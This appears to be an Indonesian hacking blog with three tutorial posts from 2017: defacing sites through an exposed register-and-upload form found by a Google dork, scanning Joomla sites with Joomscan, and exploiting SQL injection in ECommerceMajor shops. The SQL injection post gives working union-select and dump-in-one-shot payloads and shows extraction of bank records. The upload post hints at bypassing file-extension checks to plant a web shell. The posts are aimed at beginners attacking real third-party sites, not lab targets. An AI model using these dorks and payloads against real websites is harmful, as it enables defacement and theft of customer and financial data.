Minggu, 26 Februari 2017

Deface Frontend Register and Upload


Hello World ; Sore Fans, Please Say Hello Haters ;*
akwkwak welcome back Me dengan Nue Bhandell :p *biarkekucubers
tadi iseng2 baca2 artikel di Blog Garuda Security Hacker, ada artikel yang menarik dan pas banget nih utk pemula kek gua :')
udh izin sih sama tuan2fay buat di post juga di Blog TCA , thanks yo om fay :*
yupz kali ini gua bakal share Tutorial Deface Frontend Register and Upload .

Langsung intip tutornye ;*


Dork : inurl:/index.php/en/147/featured
(kembangin lagi dgn imajinasi vokepers kalean, agar dpt yg vuln n verawan)

eXploit : /index.php/frontend/login/

1. Dorking menggunakan Search Engine

2. Pilih target kalian, Lalu masukan eXploitnyee.
contoh: target.c0li/index.php/frontend/login/

3. Vulnerability ~ Muncul Form Register



4. Isi dah form registernya,, asal2an bae, sing penting username dan passwordnya jan asal2an.


klik Create account
5. Kalo register sukses hasilnya kek dibawah


6. Langsung login bae pake akun yg tadi dah lu register
7. Sukses login ?? kalo sukses langsung klik My Profile


8. klik Add files, cari File .txt yang Lu mao upload


9. jika sukses file .txt kalian akan muncul
10. File Akses o.O ?? klik kanan di simbol kaca pembesar, lalu Salin Lokasi 


11. lalu buka tab baru , pastekan alamat url File nya


kebanyakan sih: target.com/files/random.txt
Nah dah ya >..<
ini Tutor bakal lebih jozz kalo misalnye bisa di Bypass Ekstensi Shell :p
hehehe Thanks utk salah satu partner kami yaitu Garuda Security Hacker (-/\-)

owh iya, Bila ada Link atau gambar pada Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Sekian dan semoga bermanfaat .. terimakasih

Source and Thanks to: Blog Garuda Security Hacker
Gr33tz: FazLast, Cr4byP4tty, Yukinoshita 47, _Tuan2Fay_

./Nuenomaru

dan Gua Mulai tertawa Banyak Hacker Pembual Mulai bermunculan




Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Minggu, 19 Februari 2017

Tutorial Mencari Vulnerability CMS Joomla dengan Joomscan


Hello World ; Malamm Fans, Please Say Hello Haters ;*
xixixhihi, kali ini gua bakal Share salah satu Tool Scanner yang berguna utk Scanning Bug2 yang ada di Website berCMS Joomla
sebenernye sih ini Tool Scanner lawas, kali aja msh crotz
yupz, Nue bakal Share Tutorial Mencari Celah (Vulnerability) CMS Joomla dengan Joomscan .
Kali ini gua praktekinnya di Kali Linux, silahkan coba di Distro2 Linux kesayangan anda :p



Untuk membuka dan melihat opsi yang ada pada joomscan, ketikkan pada terminal

joomscan


Terus kite update terlebih dahulu untuk memeriksa dan memperbarui database lokal joomscan jika versi yang lebih baru tersedia, gunakan perintah

joomscan update


Selanjutnya untuk melakukan scanning, perintahnya cukup mudah, seperti dibawah ini

joomscan -u target.cr0tz



Dan tunggu hingga prosses selesai ...

Screenshot dibawah menunjukkan terdapat 1 buah vulnerable dengan keterangan YES, di sana juga diberikan link mengenai exploit tersebut.


Pada screenshot selanjutnya menunjukkan keterangan NO dan N/A artinya tidak vuln atau tidak tersedia


Dari hasil scanning yang telah selesai dilakukan, joomscan menunjukkan terdapat 1 vulnerable pada website tersebut, selanjutnya silahkan di praktekkan sendiri agar lebih tau fungsi dar tools joomscan ini.

Maaf bila Gua jarang Update >..< , lagi prepare jemput MasaDepan nih #anjaay 8|

owh iya, Bila ada Link atau gambar pada Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Joomla Hacked ~
Sekian dan semoga bermanfaat .. terimakasih

source and thanks to: anherr Blog's

Maq Lo yang leet aja gak songong ajg







Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Jumat, 17 Februari 2017

ECommerceMajor SQL Injection Vulnerability


Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial Deface Website dengan eXploit ECommerceMajor SQL Injection Vulnerability.

cielahh kalo baca/ denger kata yang berbau E-Commerce biasanya para kardiman pada merapat nih awkkw.
yoi E Commerce Major ini salah satu platforms utk online business, kemungkinan besar semua website online shop :D

hadeh dump dump dump akwkkakw.
Happy Injector, kuy langsung disimak.


#Exploit Author : Rahul Pratap Singh
#Date           : 13/Dec/2015
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Website        : 0x62626262.wordpress.com
#Linkedin       : https://in.linkedin.com/in/rahulpratapsingh94

Dork : inurl:/productdtl.php site:.

eXploit : productdtl.php?prodid=<SQLI>

1. pertama kita cari target menggunakan dork diatas.
Setelah kita mendapatkan target, lakukan tes untuk mengetahui vuln atau tidak menggunakan
contoh : 127.0.0.1/productdtl.php?prodid=1


2. coba kita balance dengan +--+
contoh :  127.0.0.1/productdtl.php?prodid=1+--+


3. jika halaman menjadi seperti semula, berarti balance sukses

coba kita menghitung jumlah column nya dengan menggunakan order by

contoh :  
127.0.0.1/productdtl.php?prodid=1+order+by+1--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+2--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+3--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+10--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+11--+error, berarti jumlah columnnya 10.

sekarang kita cari angka ajaibnya menggunakan union select

contoh :
127.0.0.1/productdtl.php?prodid=-1+union+select+1,2,3,4,5,6,7,8,9,10--+


4. nah angka ajaibnya muncul, sekarang kita dump menggunakan DIOS nya mas madblood

contoh: 127.0.0.1/productdtl.php?prodid=1+productdtl.php?prodid=-2+union+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10--+


5. nah muncul kan? Tuh liat ada data bank juga xixixixi
sekarang kita coba dump lagi data datanya xixixix

contoh :
127.0.0.1/productdtl.php?prodid=-2+union+select+1,group_concat(bnk_title,0x3a,bnk_name,0x3a,bnk_br,0x3a,bnk_city),3,4,5,6,7,8,9,10 from cp_info--+


tuh keluarkan data datanya? Xixixix

Artikel Tutorial yang ada diBlog ini hanya untuk pembelajaran ya kak, jadi segala perbuatan yang Lu lakukan, semua di tanggung sang pembaca.
Kami tidak bertanggung jawab setidikpun, kami Hanya membantu para pembaca yang pemula seperti kami, jadi jangan banyakin Drama gak jelas wkwkwk.
Kalo ada pertanyaan silahkan ke fanspage atau Official Account Line kami.

happy hacking SQL Injection guys :)

3xBitCh








Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i
 

ande ande lumoet Template by Ipietoon Cute Blog Design